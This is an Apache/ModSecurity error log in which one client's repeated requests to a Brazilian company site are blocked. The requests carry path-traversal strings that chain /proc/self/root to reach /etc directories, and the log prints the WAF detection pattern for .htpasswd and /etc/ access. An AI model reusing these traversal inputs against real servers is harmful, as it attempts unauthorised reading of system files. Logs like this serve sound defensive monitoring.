[Tue Mar 17 20:35:58.971000 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:58032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlXvPqhzTj3BvfDX-tYQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:05.911406 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:58042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlZew_le52K8_3pV1xowAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:07.121842 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:36:10.903273 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:58046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlauyqAr6etmhZHNpL4QAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:14.582671 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:46684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlboh-PF_25v4hFRCPZAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:16.961334 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:46694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlcMdf6f5d65gmYZRh0AAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:18.315082 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:44314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlchj0p0SRWAqcjGGe7AAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:22.601028 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:44328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlduw_le52K8_3pV1xqQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:26.901310 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:44332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnleuyqAr6etmhZHNpL6wAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:28.041873 2026] [proxy_fcgi:error] [pid 25836:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:36:28.534702 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.241.31:35396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlfIh-PF_25v4hFRCPZgAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:30.107065 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:35404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlfuyqAr6etmhZHNpL7QAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:33.344769 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:35406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlgYh-PF_25v4hFRCPbAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:34.619702 2026] [:error] [pid 16449:tid 140411540502272] [client 74.7.241.31:35416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlgkeQbjTSjgbmHFr1eQAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:36.072156 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.241.31:35430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlhIh-PF_25v4hFRCPbQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:40.069661 2026] [:error] [pid 25836:tid 140411565680384] [client 74.7.241.31:35430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnliIh-PF_25v4hFRCPcQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:41.381999 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:49626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnliRj0p0SRWAqcjGGe7gAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:42.708785 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:49640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnliuyqAr6etmhZHNpL9AAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:44.084418 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:49648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnljOw_le52K8_3pV1xqwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:45.392407 2026] [:error] [pid 11088:tid 140411649607424] [client 74.7.241.31:49658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnljWmqtCojLHvu5cKOVwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:46.679005 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.241.31:49662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnljuw_le52K8_3pV1xrQAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:46.883892 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:49662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnljuw_le52K8_3pV1xrgAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:48.180172 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:59148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlkNY0UrI5A3LftIwkrgAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:49.487081 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:59158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlkcdf6f5d65gmYZRh1gAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
